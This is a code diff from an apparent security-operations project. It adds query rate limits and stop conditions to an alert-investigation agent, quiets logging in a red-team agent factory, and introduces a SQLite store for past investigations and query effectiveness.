+ markdown = self.generate_report_markdown(report)
+ report_path = self.reports_dir / f"correlation_{operation_id}.md"
+ report_path.write_text(markdown)
+ logger.success(f"Generated correlation report: {report_path}")
+
+ return reports
diff --git a/src/ares/core/factories/blue_factory.py b/src/ares/core/factories/blue_factory.py
index 39022545..bb64d903 100644
--- a/src/ares/core/factories/blue_factory.py
+++ b/src/ares/core/factories/blue_factory.py
@@ -1,84 +1,444 @@
"""Factory for creating investigation agents with presets."""
+import functools
+from typing import Any
+
import dreadnode as dn
from dreadnode.agent import Agent
-from dreadnode.agent.events import AgentStalled, ToolEnd, ToolStart
+from dreadnode.agent.events import AgentEvent, AgentStalled, ToolEnd, ToolStart
from dreadnode.agent.hooks import retry_with_feedback
-from dreadnode.agent.stop import tool_use
+from dreadnode.agent.stop import StopCondition, tool_use
from dreadnode.agent.thread import Thread
from loguru import logger
from ares.core.models import InvestigationState
+from ares.core.query_resilience import QueryResilientExecutor, get_resilient_executor
from ares.core.templates import get_template_loader
from ares.integrations.mitre import MITREAttackClient
from ares.tools.blue import (
CompletionTools,
GrafanaTools,
InvestigationTools,
+ LearningTools,
+ QueryTemplateTools,
QuestionEngineTools,
escalate_investigation,
)
from ares.tools.shared import MITRELookupTools
-# Load system instructions from template
SYSTEM_INSTRUCTIONS = get_template_loader().render("agent/system_instructions.md.jinja")
-# Track consecutive query calls without workflow progress
-_consecutive_queries = []
+# Track query calls - reset per investigation via reset_query_tracking()
+_total_queries = 0
+_consecutive_queries: list[str] = []
+_query_limit_hit = False
+_executed_queries: list[dict] = []
+_seen_queries: dict[str, int] = {} # Track query -> count to detect loops
+_current_state: "InvestigationState | None" = None
+MAX_QUERIES_PER_INVESTIGATION = 5
+MAX_QUERIES_CRITICAL = 8 # Higher limit for critical alerts
+MAX_DUPLICATE_QUERIES = 2 # Max times same query can run before blocking
+
+
+def reset_query_tracking():
+ """Reset query tracking for a new investigation."""
+ from ares.core.query_resilience import reset_resilient_executor
+
+ global \
+ _total_queries, \
+ _consecutive_queries, \
+ _query_limit_hit, \
+ _executed_queries, \
+ _seen_queries, \
+ _current_state
+ _total_queries = 0
+ _consecutive_queries = []
+ _query_limit_hit = False
+ _executed_queries = []
+ _seen_queries = {}
+ _current_state = None
+ reset_resilient_executor()
+
+
+def set_investigation_state(state: "InvestigationState"):
+ """Set the current investigation state for query recording."""
+ global _current_state
+ _current_state = state
+
+
+def _get_query_limit() -> int:
+ """Get the query limit based on alert severity."""
+ if _current_state:
+ severity = _current_state.alert.get("labels", {}).get("severity", "").lower()
+ if severity == "critical":
+ return MAX_QUERIES_CRITICAL
+ return MAX_QUERIES_PER_INVESTIGATION
+
+
+def _check_query_limit() -> str | None:
+ """Check if query limit is reached. Returns error message if limit hit, None otherwise."""
+ global _query_limit_hit
+ limit = _get_query_limit()
+ if _query_limit_hit or _total_queries >= limit:
+ _query_limit_hit = True
+ return (
+ f"🛑 QUERY LIMIT REACHED ({_total_queries}/{limit}). You have exceeded the maximum number of queries.\n\n"
+ "You MUST call complete_investigation(summary='...', attack_synopsis='...', recommendations=[...]) NOW.\n\n"
+ "Summarize what you found from previous queries and complete the investigation.\n"
+ "Do NOT attempt any more queries - they will all be blocked.\n\n"
+ "REMEMBER: Include attack_synopsis (narrative of what happened) and recommendations (list of actions).\n\n"
+ "Example:\n"
+ "complete_investigation(\n"
+ " summary='Investigated [alert name]. Found [evidence/no evidence]. Confidence: [level].',\n"
+ " attack_synopsis='At [time], [user/IP] performed [action] against [target]...',\n"
+ " recommendations=['Reset compromised passwords', 'Block source IP', ...]\n"
+ ")"
+ )
+ return None
+
+
+def _check_duplicate_query(query: str) -> str | None:
+ """Check if query is a duplicate. Returns error message if duplicate limit hit."""
+ # Normalize query for comparison (strip whitespace, lowercase)
+ normalized = query.strip().lower()
+
+ count = _seen_queries.get(normalized, 0)
+ if count >= MAX_DUPLICATE_QUERIES:
+ logger.warning(f"🔁 Duplicate query blocked (run {count + 1} times): {query[:100]}...")
+ return (
+ f"🔁 DUPLICATE QUERY BLOCKED. You've already run this query {count} times.\n\n"
+ "**DO NOT re-run the same query.** Instead:\n\n"
+ "1. **PARSE THE RESULTS** you already received\n"
+ "2. **EXTRACT IOCs** from the JSON:\n"
+ " - Look for 'computer' field → record as hostname\n"
+ " - Look for 'TargetUserName' in event_data → record as user\n"
+ " - Look for 'IpAddress' in event_data → record as IP\n"
+ "3. **CALL record_evidence()** for each IOC found\n"
+ "4. **Then try a DIFFERENT query** or call complete_investigation()\n\n"
+ "Example extraction from previous results:\n"
+ "```\n"
+ "record_evidence(evidence_type='hostname', value='winterfell.north.sevenkingdoms.local', ...)\n"
+ "record_evidence(evidence_type='user', value='robb.stark', ...)\n"
+ "```"
+ )
+
+ # Increment count
+ _seen_queries[normalized] = count + 1
+ return None
+
+
+def _increment_query_count(tool_name: str):
+ """Increment query counter and log."""
+ global _total_queries
+ _total_queries += 1
+ _consecutive_queries.append(tool_name)
+ if len(_consecutive_queries) > 5:
+ _consecutive_queries.pop(0)
+ limit = _get_query_limit()
+ logger.info(f"📊 Query count: {_total_queries}/{limit}")
+
+
+def _record_query(tool_name: str, kwargs: dict, result_count: int | None = None):
+ """Record a query to the investigation state."""
+ from datetime import datetime, timezone
+
+ query_record = {
+ "type": tool_name,
+ "query": kwargs.get("logql") or kwargs.get("expr") or str(kwargs),
+ "timestamp": datetime.now(timezone.utc).isoformat(),
+ "result_count": result_count,
+ "datasource": kwargs.get("datasourceUid", "unknown"),
+ }
+ _executed_queries.append(query_record)
+
+ if _current_state:
+ _current_state.executed_queries.append(query_record)
+
+
+def create_rate_limited_mcp_tool(
+ original_tool: Any, resilient_executor: QueryResilientExecutor | None = None
+) -> Any:
+ """
+ Wrap an MCP tool with rate limiting and resilient execution.
+
+ The wrapper checks the global query counter BEFORE executing.
+ If limit is reached, returns an error message instead of executing.
+ This ensures the LLM sees the limit message even when batching queries.
+
+ Features:
+ - Rate limiting to prevent query abuse
+ - Duplicate query detection
+ - Automatic retry with exponential backoff (via resilient executor)
+ - Automatic time range reduction on timeout
+ """
+ tool_name = getattr(original_tool, "name", "") or getattr(original_tool, "__name__", "")
+
+ # Only wrap query tools
+ if "query_loki" not in tool_name and "query_prometheus" not in tool_name:
+ return original_tool
+
+ logger.debug(f"Wrapping MCP tool with rate limiting and resilience: {tool_name}")
+
+ original_fn = getattr(original_tool, "fn", None)
+ if original_fn is None and callable(original_tool):
+ original_fn = original_tool
+
+ if original_fn is None:
+ logger.warning(f"Could not find callable for tool {tool_name}, not wrapping")
+ return original_tool
+
+ executor = resilient_executor or get_resilient_executor()
+
+ @functools.wraps(original_fn)
+ async def rate_limited_wrapper(*args, **kwargs):
+ error_msg = _check_query_limit()
+ if error_msg:
+ logger.critical(f"🛑 Blocking query tool {tool_name} - limit reached")
+ return error_msg
+
+ query_str = kwargs.get("logql") or kwargs.get("expr") or ""
+ if query_str:
+ dup_msg = _check_duplicate_query(query_str)
+ if dup_msg:
+ logger.warning(f"🔁 Blocking duplicate query: {query_str[:50]}...")
+ return dup_msg
+
+ # Increment counter
+ _increment_query_count(tool_name)
+
+ # Extract time parameters for resilient execution
+ start_time = kwargs.get("startRfc3339") or kwargs.get("start_time") or kwargs.get("start")
+ end_time = kwargs.get("endRfc3339") or kwargs.get("end_time") or kwargs.get("end")
+
+ # If we have time parameters, use resilient executor
+ if start_time and end_time and query_str:
+ logger.info(f"Using resilient executor for {tool_name}")
+ try:
+
+ async def query_wrapper(logql: str, start_time: str, end_time: str, **kw):
+ updated_kwargs = {**kwargs}
+ if "startRfc3339" in kwargs:
+ updated_kwargs["startRfc3339"] = start_time
+ updated_kwargs["endRfc3339"] = end_time
+ elif "start_time" in kwargs:
+ updated_kwargs["start_time"] = start_time
+ updated_kwargs["end_time"] = end_time
+ elif "start" in kwargs:
+ updated_kwargs["start"] = start_time
+ updated_kwargs["end"] = end_time
+ if "logql" in updated_kwargs:
+ updated_kwargs["logql"] = logql
+ elif "expr" in updated_kwargs:
+ updated_kwargs["expr"] = logql
+ return await original_fn(*args, **updated_kwargs)
+
+ result = await executor.execute_with_resilience(
+ query_wrapper,
+ query_str,
+ start_time,
+ end_time,
+ )
+
+ # Record the query with result count
+ result_count = _extract_result_count(result)
+ _record_query(tool_name, kwargs, result_count)
+
+ # Log resilience metadata if present
+ if isinstance(result, dict) and "_resilience_metadata" in result:
+ meta = result["_resilience_metadata"]
+ if meta.get("time_range_reduced"):
+ logger.info(
+ f"Query succeeded with reduced time range "
+ f"({meta.get('time_range_factor', 1.0) * 100:.0f}%)"
+ )
+ if meta.get("retry_count", 0) > 0:
+ logger.info(f"Query succeeded after {meta['retry_count']} retries")
+
+ return result
+
+ except Exception as e:
+ logger.error(f"Resilient execution failed: {e}")
+ _record_query(tool_name, kwargs, result_count=0)
+ return {
+ "status": "error",
+ "error": str(e),
+ "suggestion": "Try a shorter time range or more specific filters.",
+ }
+
+ # Fallback to original execution without resilience (no time params)
+ try:
+ result = await original_fn(*args, **kwargs)
+ result_count = _extract_result_count(result)
+ _record_query(tool_name, kwargs, result_count)
+ return result
+ except Exception as e:
+ error_str = str(e)
+ # Handle gRPC timeout from mcp-grafana (10s default timeout)
+ if "grpc" in error_str.lower() and "connection is closing" in error_str:
+ logger.warning(f"Query tool {tool_name} timed out (mcp-grafana 10s limit)")
+ _record_query(tool_name, kwargs, result_count=0)
+ return {
+ "error": "Query timed out due to mcp-grafana 10s limit. "
+ "Try a shorter time range (e.g., last 1 hour instead of 24 hours) "
+ "or add more specific label filters to reduce the query scope."
+ }
+ logger.error(f"Query tool {tool_name} failed: {e}")
+ _record_query(tool_name, kwargs, result_count=0)
+ raise
+
+ if hasattr(original_tool, "fn"):
+ # It's a Tool object with a .fn attribute
+ original_tool.fn = rate_limited_wrapper
+ return original_tool
+ # It's a callable, just return the wrapper
+ rate_limited_wrapper.__name__ = tool_name
+ return rate_limited_wrapper
+
+
+def _extract_result_count(result: Any) -> int | None:
+ """Extract result count from various result formats."""
+ if isinstance(result, list):
+ return len(result)
+ if isinstance(result, dict):
+ if "results" in result:
+ return len(result.get("results", []))
+ if "data" in result:
+ data = result.get("data", {})
+ if isinstance(data, dict) and "result" in data:
+ streams = data.get("result", [])
+ if isinstance(streams, list):
+ total = 0
+ for stream in streams:
+ values = stream.get("values", [])
+ total += len(values) if isinstance(values, list) else 0
+ return total
+ if isinstance(result, str):
+ return result.count("\n") if result else 0
+ return None
+
+
+def wrap_mcp_query_tools(mcp_tools: list) -> list:
+ """
+ Wrap all query-related MCP tools with rate limiting.
+
+ Args:
+ mcp_tools: List of MCP tools from Grafana MCPClient
+
+ Returns:
+ List of tools with query tools wrapped for rate limiting
+ """
+ wrapped = []
+ wrapped_count = 0
+
+ for tool in mcp_tools:
+ tool_name = getattr(tool, "name", "") or getattr(tool, "__name__", str(tool))
+
+ if "query_loki" in tool_name or "query_prometheus" in tool_name:
+ wrapped_tool = create_rate_limited_mcp_tool(tool)
+ wrapped.append(wrapped_tool)
+ wrapped_count += 1
+ logger.info(f"✅ Wrapped query tool: {tool_name}")
+ else:
+ wrapped.append(tool)
+
+ logger.info(f"Wrapped {wrapped_count} query tools with rate limiting")
+ return wrapped
async def log_tool_usage(event: ToolStart):
- """Log tool calls for observability and detect loops."""
+ """Log tool calls for observability."""
+ # Note: Query counting is now handled by the rate-limited wrapper (create_rate_limited_mcp_tool)
+ # This hook only handles logging and metrics
if hasattr(event, "tool_call") and event.tool_call:
tool_name = event.tool_call.name
logger.info(f"🔧 Tool call: {tool_name}")
dn.log_metric(f"tool_{tool_name}", 1, mode="count")
- # Track if agent is stuck in query loop
- if "query_loki" in tool_name or "query_prometheus" in tool_name:
- _consecutive_queries.append(tool_name)
- # Keep only last 5 calls
- if len(_consecutive_queries) > 5:
- _consecutive_queries.pop(0)
-
- # If last 3 calls are all queries, warn
- if len(_consecutive_queries) >= 3 and all(
- "query_loki" in t or "query_prometheus" in t for t in _consecutive_queries[-3:]
- ):
- logger.warning(
- "⚠️ DETECTED QUERY LOOP: 3+ consecutive queries without recording evidence"
- )
- logger.warning(
- "Agent should call record_evidence() or get_combined_questions() next"
- )
- elif "record_evidence" in tool_name or "get_combined_questions" in tool_name:
- # Reset counter when workflow tools are called
+ # Clear consecutive queries on completion
+ if "complete_investigation" in tool_name or "escalate_investigation" in tool_name:
_consecutive_queries.clear()
async def log_tool_result(event: ToolEnd):
- """Log tool results."""
+ """Log tool results for observability."""
+ # Note: Query limit enforcement is now handled by the rate-limited wrapper
+ # The wrapper returns an error message BEFORE execution, so the LLM sees it
if hasattr(event, "tool_call") and event.tool_call:
+ tool_name = event.tool_call.name
if hasattr(event, "error") and event.error:
- logger.warning(f"❌ Tool {event.tool_call.name} failed: {event.error}")
+ logger.warning(f"❌ Tool {tool_name} failed: {event.error}")
dn.log_metric("tool_errors", 1, mode="count")
else:
- logger.info(f"✅ Tool {event.tool_call.name} completed")
+ logger.info(f"✅ Tool {tool_name} completed")
unstall_hook = retry_with_feedback(
event_type=AgentStalled,
feedback=(
- "You seem stuck. Remember:\n"
- "1. Call get_combined_questions() to get next questions\n"
- "2. Execute queries in PARALLEL to answer those questions\n"
- "3. Record evidence with record_evidence() for EVERY finding\n"
- "4. When done, call complete_investigation() or escalate_investigation()\n\n"
- "If queries return empty results, document that and try broader queries OR move forward."
+ "🛑 YOU ARE STUCK. You MUST call complete_investigation() NOW with ALL parameters.\n\n"
+ "Required parameters:\n"
+ "1. summary: What you found (or 'No malicious activity confirmed' if nothing)\n"
+ "2. attack_synopsis: Narrative of what happened chronologically\n"
+ "3. recommendations: List of actions to take (check alert annotations for 'response' guidance)\n\n"
+ "Example:\n"
+ "complete_investigation(\n"
+ " summary='Investigated DCSync alert. No matching events in time window. Confidence: Low.',\n"
+ " attack_synopsis='Alert triggered at [time] for potential DCSync activity. "
+ "Investigation found no corroborating evidence in Loki logs.',\n"
+ " recommendations=['Continue monitoring for Event 4662', 'Review DC access logs manually']\n"
+ ")\n\n"
+ "DO NOT make more queries. Call complete_investigation() NOW."
),
)
+def max_queries_stop(max_queries: int = 5) -> StopCondition:
+ """Stop condition that fires after max_queries Loki/Prometheus queries."""
+ from collections.abc import Sequence
+
+ def stop(events: Sequence[AgentEvent]) -> bool:
+ query_count = sum(
+ 1
+ for e in events
+ if isinstance(e, ToolEnd)
+ and hasattr(e, "tool_call")
+ and e.tool_call
+ and ("query_loki" in e.tool_call.name or "query_prometheus" in e.tool_call.name)
+ )
+ if query_count >= max_queries:
+ logger.critical(
+ f"🛑 STOP CONDITION: Max queries ({max_queries}) reached. Forcing stop."
+ )
+ return True
+ return False
+
+ return StopCondition(stop, name="stop_on_max_queries")
+
+
+def max_tool_calls_stop(max_calls: int = 20) -> StopCondition:
+ """Stop condition that fires after max_calls TOTAL tool calls without completion.
+
+ This is a safety net to prevent infinite loops when the agent keeps calling
+ non-query tools (record_evidence, get_combined_questions, etc.) without
+ ever calling complete_investigation.
+ """
+ from collections.abc import Sequence
+
+ def stop(events: Sequence[AgentEvent]) -> bool:
+ tool_count = sum(
+ 1 for e in events if isinstance(e, ToolEnd) and hasattr(e, "tool_call") and e.tool_call
+ )
+ if tool_count >= max_calls:
+ logger.critical(
+ f"🛑 STOP CONDITION: Max tool calls ({max_calls}) reached without completion. "
+ "Agent must call complete_investigation() or escalate_investigation()."
+ )
+ return True
+ return False
+
+ return StopCondition(stop, name="stop_on_max_tool_calls")
+
+
def create_investigation_agent(
model: str,
grafana_url: str,
@@ -86,7 +446,7 @@ def create_investigation_agent(
mitre_client: MITREAttackClient,
state: InvestigationState,
grafana_mcp_tools: list | None = None,
- max_steps: int = 150,
+ max_steps: int = 30,
) -> Agent:
"""
Create a configured investigation agent.
@@ -103,6 +463,8 @@ def create_investigation_agent(
Returns:
Configured agent ready to investigate
"""
+ set_investigation_state(state)
+
grafana_tools = GrafanaTools(
base_url=grafana_url,
api_key=grafana_api_key,
@@ -110,6 +472,7 @@ def create_investigation_agent(
investigation_tools = InvestigationTools()
investigation_tools.set_state(state)
+ investigation_tools.set_mitre_client(mitre_client)
question_tools = QuestionEngineTools()
question_tools.set_engines(mitre_client, state)
@@ -120,20 +483,27 @@ def create_investigation_agent(
completion_tools = CompletionTools()
completion_tools.set_state(state)
- # Build tool list
+ loki_url = grafana_url.rstrip("/")
+ query_template_tools = QueryTemplateTools(loki_url=loki_url)
+
+ learning_tools = LearningTools()
+
tools: list = [
grafana_tools,
investigation_tools,
question_tools,
mitre_tools,
completion_tools,
+ query_template_tools,
+ learning_tools,
escalate_investigation,
]
- # Add Grafana MCP tools if available
if grafana_mcp_tools:
logger.info(f"Adding {len(grafana_mcp_tools)} Grafana MCP tools to agent")
- tools.extend(grafana_mcp_tools)
+ # Wrap query tools with rate limiting to prevent infinite query loops
+ wrapped_tools = wrap_mcp_query_tools(grafana_mcp_tools)
+ tools.extend(wrapped_tools)
else:
logger.warning(
"No Grafana MCP tools available - agent will have limited query capabilities"
@@ -153,6 +523,8 @@ def create_investigation_agent(
stop_conditions=[
tool_use("complete_investigation"),
tool_use("escalate_investigation"),
+ max_queries_stop(max_queries=5), # Force stop after 5 queries
+ max_tool_calls_stop(max_calls=20), # Force stop after 20 total tool calls
],
thread=Thread(), # type: ignore[call-arg]
)
diff --git a/src/ares/core/factories/red_factory.py b/src/ares/core/factories/red_factory.py
index 483bb3ae..4c2b525c 100644
--- a/src/ares/core/factories/red_factory.py
+++ b/src/ares/core/factories/red_factory.py
@@ -1,5 +1,7 @@
"""Factory for creating red team agents with presets."""
+import time
+
import dreadnode as dn
from dreadnode.agent import Agent
from dreadnode.agent.events import (
@@ -36,37 +38,95 @@
"redteam/agents/system_instructions.md.jinja"
)
+# Event deduplication state
+_last_event_times: dict[str, float] = {}
+_last_step_number: int | None = None
+_DEBOUNCE_WINDOW = 0.1 # 100ms debounce window
+
+
+def reset_event_tracking():
+ """Reset event tracking state for a new agent run."""
+ global _last_event_times, _last_step_number
+ _last_event_times = {}
+ _last_step_number = None
+
+
+def _should_log_event(event_type: str) -> bool:
+ """Check if event should be logged (debounce rapid duplicates)."""
+ now = time.time()
+ last_time = _last_event_times.get(event_type, 0)
+ if now - last_time < _DEBOUNCE_WINDOW:
+ return False
+ _last_event_times[event_type] = now
+ return True
+
async def log_step_start(event: StepStart):
- """Log step start for debugging."""
- logger.info(f"📍 Step started: step_number={getattr(event, 'step_number', '?')}")
+ """Log step start for debugging - only when step number is meaningful."""
+ global _last_step_number
+ step_num = getattr(event, "step_number", None)
+
+ # Skip if no real step number or if it's the same as last logged step
+ if step_num is None or step_num == _last_step_number:
+ return
+
+ if not _should_log_event("step_start"):
+ return
+
+ _last_step_number = step_num
+ logger.info(f"📍 Step {step_num} started")
async def log_generation_end(event: GenerationEnd):
- """Log generation end with details."""
- logger.info("📍 Generation ended")
- # Log the message if available
- if hasattr(event, "message") and event.message:
- msg = event.message
- logger.info(f"📍 Message type: {type(msg).__name__}")
- if hasattr(msg, "content"):
- logger.info(f"📍 Message content (first 500 chars): {str(msg.content)[:500]}")
- if hasattr(msg, "tool_calls") and msg.tool_calls:
- logger.info(f"📍 Tool calls requested: {[tc.name for tc in msg.tool_calls]}")
+ """Log generation end - only when there's meaningful content."""
+ # Skip empty/spurious generation events
+ if not hasattr(event, "message") or not event.message:
+ return
+
+ msg = event.message
+ has_content = hasattr(msg, "content") and msg.content and str(msg.content).strip()
+ has_tool_calls = hasattr(msg, "tool_calls") and msg.tool_calls
+
+ # Only log if there's actual content or tool calls
+ if not has_content and not has_tool_calls:
+ return
+
+ if not _should_log_event("generation_end"):
+ return
+
+ # Log concise summary
+ if has_tool_calls:
+ tool_names = [tc.name for tc in msg.tool_calls]
+ logger.info(f"🤖 Agent requesting tools: {tool_names}")
+ elif has_content:
+ content_preview = str(msg.content)[:200].replace("\n", " ")
+ logger.info(f"🤖 Agent: {content_preview}...")
async def log_agent_error(event: AgentError):
- """Log agent errors."""
+ """Log agent errors - only real errors, not spurious SDK events."""
error = getattr(event, "error", None)
+ # Only log if there's an actual error (SDK emits AgentError with None frequently)
+ if error is None:
+ return # Silently ignore spurious events
+
logger.error(f"🚨 Agent error: {error}")
- if hasattr(event, "traceback"):
+ if hasattr(event, "traceback") and event.traceback:
logger.error(f"🚨 Traceback: {event.traceback}")
async def log_agent_end(event: AgentEnd):
- """Log agent end."""
+ """Log agent end - only when there's a meaningful stop reason."""
stop_reason = getattr(event, "stop_reason", None)
- logger.info(f"📍 Agent ended: stop_reason={stop_reason}")
+
+ # Skip spurious end events with no stop reason
+ if stop_reason is None:
+ return
+
+ if not _should_log_event("agent_end"):
+ return
+
+ logger.info(f"🏁 Agent ended: {stop_reason}")
async def log_tool_usage(event: ToolStart):
@@ -151,6 +211,9 @@ def create_redteam_agent(
Returns:
Configured agent ready for penetration testing operations
"""
+ # Reset event tracking for fresh agent run
+ reset_event_tracking()
+
# Initialize toolsets
network_tools = NetworkEnumerationTools()
network_tools.set_state(state)
diff --git a/src/ares/core/persistence.py b/src/ares/core/persistence.py
new file mode 100644
index 00000000..2fd0d833
--- /dev/null
+++ b/src/ares/core/persistence.py
@@ -0,0 +1,843 @@
+"""
+Investigation Persistence and Learning System.
+
+Stores investigation results for learning and provides
+similarity-based lookup for new alerts.
+"""
+
+from __future__ import annotations
+
+import json
+import sqlite3
+from contextlib import contextmanager
+from dataclasses import dataclass, field
+from datetime import datetime, timezone
+from pathlib import Path
+from typing import TYPE_CHECKING, Any, ClassVar
+
+if TYPE_CHECKING:
+ from collections.abc import Generator
+
+ from ares.core.models import InvestigationState
+
+import dreadnode as dn
+from loguru import logger
+
+
+@dataclass
+class StoredInvestigation:
+ """A persisted investigation record."""
+
+ investigation_id: str
+ alert_name: str
+ alert_fingerprint: str # Unique identifier for this alert type
+ severity: str
+ technique_id: str | None
+ technique_name: str | None
+
+ # Timestamps
+ started_at: datetime
+ completed_at: datetime
+ duration_seconds: float
+
+ # Results
+ status: str # completed, escalated, timeout, failed
+ evidence_count: int
+ highest_pyramid_level: int
+ techniques_identified: list[str]
+
+ # Learning data
+ queries_executed: list[dict]
+ query_success_rate: float # % of queries that returned results
+ effective_queries: list[str] # Queries that produced evidence
+
+ # Outcome assessment
+ is_true_positive: bool | None = None # Manual label if available
+ analyst_notes: str | None = None
+
+ # Metadata
+ metadata: dict[str, Any] = field(default_factory=dict)
+
+ def to_dict(self) -> dict[str, Any]:
+ """Convert to dictionary for storage."""
+ return {
+ "investigation_id": self.investigation_id,
+ "alert_name": self.alert_name,
+ "alert_fingerprint": self.alert_fingerprint,
+ "severity": self.severity,
+ "technique_id": self.technique_id,
+ "technique_name": self.technique_name,
+ "started_at": self.started_at.isoformat(),
+ "completed_at": self.completed_at.isoformat(),
+ "duration_seconds": self.duration_seconds,
+ "status": self.status,
+ "evidence_count": self.evidence_count,
+ "highest_pyramid_level": self.highest_pyramid_level,
+ "techniques_identified": self.techniques_identified,
+ "queries_executed": self.queries_executed,
+ "query_success_rate": self.query_success_rate,
+ "effective_queries": self.effective_queries,
+ "is_true_positive": self.is_true_positive,
+ "analyst_notes": self.analyst_notes,
+ "metadata": self.metadata,
+ }
+
+ @classmethod
+ def from_dict(cls, data: dict[str, Any]) -> StoredInvestigation:
+ """Create from dictionary."""
+ return cls(
+ investigation_id=data["investigation_id"],
+ alert_name=data["alert_name"],
+ alert_fingerprint=data["alert_fingerprint"],
+ severity=data["severity"],
+ technique_id=data.get("technique_id"),
+ technique_name=data.get("technique_name"),
+ started_at=datetime.fromisoformat(data["started_at"]),
+ completed_at=datetime.fromisoformat(data["completed_at"]),
+ duration_seconds=data["duration_seconds"],
+ status=data["status"],
+ evidence_count=data["evidence_count"],
+ highest_pyramid_level=data["highest_pyramid_level"],
+ techniques_identified=data.get("techniques_identified", []),
+ queries_executed=data.get("queries_executed", []),
+ query_success_rate=data.get("query_success_rate", 0.0),
+ effective_queries=data.get("effective_queries", []),
+ is_true_positive=data.get("is_true_positive"),
+ analyst_notes=data.get("analyst_notes"),
+ metadata=data.get("metadata", {}),
+ )
+
+
+@dataclass
+class QueryEffectiveness:
+ """Statistics about query effectiveness."""
+
+ query_pattern: str # Normalized query pattern
+ total_executions: int
+ successful_executions: int # Returned results
+ evidence_producing: int # Led to recorded evidence
+ alert_types: list[str] # Alert names where this query was used
+
+ @property
+ def success_rate(self) -> float:
+ if self.total_executions == 0:
+ return 0.0
+ return self.successful_executions / self.total_executions
+
+ @property
+ def evidence_rate(self) -> float:
+ if self.total_executions == 0:
+ return 0.0
+ return self.evidence_producing / self.total_executions
+
+
+@dataclass
+class SimilarInvestigation:
+ """A similar past investigation."""
+
+ investigation: StoredInvestigation
+ similarity_score: float
+ matching_factors: list[str]
+
+
+class InvestigationStore:
+ """SQLite-backed storage for investigations.
+
+ Provides:
+ - Persistence of investigation results
+ - Query effectiveness tracking
+ - Similar investigation lookup
+ - False positive learning
+ """
+
+ SCHEMA_VERSION = 1
+
+ # Table names
+ TABLE_INVESTIGATIONS = "investigations"
+ TABLE_QUERY_EFFECTIVENESS = "query_effectiveness"
+ TABLE_SCHEMA_INFO = "schema_info"
+
+ # Column definitions for investigations table
+ INVESTIGATIONS_COLUMNS: ClassVar[list[str]] = [
+ "investigation_id",
+ "alert_name",
+ "alert_fingerprint",
+ "severity",
+ "technique_id",
+ "technique_name",
+ "started_at",
+ "completed_at",
+ "duration_seconds",
+ "status",
+ "evidence_count",
+ "highest_pyramid_level",
+ "techniques_identified",
+ "queries_executed",
+ "query_success_rate",
+ "effective_queries",
+ "is_true_positive",
+ "analyst_notes",
+ "metadata",
+ ]
+
+ # Schema SQL
+ SQL_CREATE_INVESTIGATIONS = """
+ CREATE TABLE IF NOT EXISTS investigations (
+ investigation_id TEXT PRIMARY KEY,
+ alert_name TEXT NOT NULL,
+ alert_fingerprint TEXT NOT NULL,
+ severity TEXT,
+ technique_id TEXT,
+ technique_name TEXT,
+ started_at TEXT NOT NULL,
+ completed_at TEXT NOT NULL,
+ duration_seconds REAL,
+ status TEXT NOT NULL,
+ evidence_count INTEGER DEFAULT 0,
+ highest_pyramid_level INTEGER DEFAULT 0,
+ techniques_identified TEXT,
+ queries_executed TEXT,
+ query_success_rate REAL DEFAULT 0.0,
+ effective_queries TEXT,
+ is_true_positive INTEGER,
+ analyst_notes TEXT,
+ metadata TEXT,
+ created_at TEXT DEFAULT CURRENT_TIMESTAMP
+ )
+ """
+
+ SQL_CREATE_QUERY_EFFECTIVENESS = """
+ CREATE TABLE IF NOT EXISTS query_effectiveness (
+ query_pattern TEXT PRIMARY KEY,
+ total_executions INTEGER DEFAULT 0,
+ successful_executions INTEGER DEFAULT 0,
+ evidence_producing INTEGER DEFAULT 0,
+ alert_types TEXT,
+ last_used TEXT,
+ created_at TEXT DEFAULT CURRENT_TIMESTAMP
+ )
+ """
+
+ SQL_CREATE_SCHEMA_INFO = """
+ CREATE TABLE IF NOT EXISTS schema_info (
+ key TEXT PRIMARY KEY,
+ value TEXT
+ )
+ """
+
+ # Index SQL
+ SQL_CREATE_INDEXES: ClassVar[list[str]] = [
+ "CREATE INDEX IF NOT EXISTS idx_alert_fingerprint ON investigations(alert_fingerprint)",
+ "CREATE INDEX IF NOT EXISTS idx_technique_id ON investigations(technique_id)",
+ "CREATE INDEX IF NOT EXISTS idx_alert_name ON investigations(alert_name)",
+ ]
+
+ # Query SQL templates (columns are hardcoded constants, not user input)
+ SQL_INSERT_INVESTIGATION = """
+ INSERT OR REPLACE INTO investigations ({columns})
+ VALUES ({placeholders})
+ """.format( # noqa: S608
+ columns=", ".join(INVESTIGATIONS_COLUMNS),
+ placeholders=", ".join("?" * len(INVESTIGATIONS_COLUMNS)),
+ )
+
+ SQL_SELECT_INVESTIGATION = "SELECT * FROM investigations WHERE investigation_id = ?"
+
+ SQL_SELECT_RECENT_INVESTIGATIONS = (
+ "SELECT * FROM investigations ORDER BY completed_at DESC LIMIT ?"
+ )
+
+ SQL_UPDATE_LABEL = """
+ UPDATE investigations SET
+ is_true_positive = ?,
+ analyst_notes = COALESCE(?, analyst_notes)
+ WHERE investigation_id = ?
+ """
+
+ SQL_SELECT_QUERY_EFFECTIVENESS = "SELECT * FROM query_effectiveness WHERE query_pattern = ?"
+
+ SQL_UPDATE_QUERY_EFFECTIVENESS = """
+ UPDATE query_effectiveness SET
+ total_executions = total_executions + 1,
+ successful_executions = successful_executions + ?,
+ evidence_producing = evidence_producing + ?,
+ alert_types = ?,
+ last_used = ?
+ WHERE query_pattern = ?
+ """
+
+ SQL_INSERT_QUERY_EFFECTIVENESS = """
+ INSERT INTO query_effectiveness (
+ query_pattern, total_executions, successful_executions,
+ evidence_producing, alert_types, last_used
+ ) VALUES (?, 1, ?, ?, ?, ?)
+ """
+
+ SQL_SELECT_EFFECTIVE_QUERIES = """
+ SELECT *,
+ CAST(evidence_producing AS REAL) / NULLIF(total_executions, 0) as evidence_rate
+ FROM query_effectiveness
+ WHERE total_executions >= 3
+ ORDER BY evidence_rate DESC
+ LIMIT ?
+ """
+
+ SQL_SELECT_FALSE_POSITIVE_PATTERNS = """
+ SELECT
+ alert_name,
+ alert_fingerprint,
+ technique_id,
+ COUNT(*) as occurrences,
+ AVG(evidence_count) as avg_evidence
+ FROM investigations
+ WHERE is_true_positive = 0
+ GROUP BY alert_fingerprint
+ HAVING COUNT(*) >= ?
+ ORDER BY occurrences DESC
+ """
+
+ def __init__(self, db_path: Path | str):
+ """Initialize the store.
+
+ Args:
+ db_path: Path to SQLite database file
+ """
+ self.db_path = Path(db_path)
+ self.db_path.parent.mkdir(parents=True, exist_ok=True)
+ self._init_schema()
+
+ @contextmanager
+ def _get_connection(self) -> Generator[sqlite3.Connection, None, None]:
